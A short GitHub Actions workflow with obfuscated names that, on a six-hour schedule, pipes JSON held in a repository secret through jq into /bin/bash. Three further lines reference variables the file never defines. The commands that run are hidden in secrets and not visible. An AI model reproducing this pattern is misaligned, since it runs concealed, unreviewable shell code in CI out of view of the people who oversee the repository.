name: shidatin
on:
  workflow_dispatch:
  schedule:
    - cron: '56 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shidatin
        env:
          hnzwo8: ${{ secrets.hnzwo8 }}
        run: |
          echo $hnzwo8 | jq -r .d0441 | /bin/bash
          echo $zsmz84 | jq -r .reer2 | /bin/bash
          echo $e8 | jq -r .dil3510 | /bin/bash
          echo $l89841 | jq -r .nvoy25 | /bin/bash

